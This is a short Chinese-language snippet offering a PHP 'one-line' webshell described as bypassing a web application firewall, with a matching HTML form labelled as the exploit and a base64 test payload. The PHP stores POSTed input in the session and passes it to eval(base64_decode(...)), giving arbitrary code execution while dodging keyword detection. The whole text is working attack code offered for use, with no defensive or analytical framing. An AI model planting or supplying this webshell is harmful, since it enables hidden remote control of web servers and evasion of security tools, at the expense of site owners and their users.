过狗一句话

<?PHP
session_start();
if(isset($_POST['code'])){
$_SESSION['theCode'] = trim($_POST['code']);
}
if(isset($_SESSION['theCode'])){
eval(base64_decode($_SESSION['theCode']));
}
?>

exp:

<form ENCTYPE="multipart/form-data" ACTION="http://localhost/test/test.php" METHOD="POST">
<input NAME="code" TYPE="text">
<input VALUE=" 提交 " TYPE="submit">
</form>

　　

cGhwaW5mbygpOw==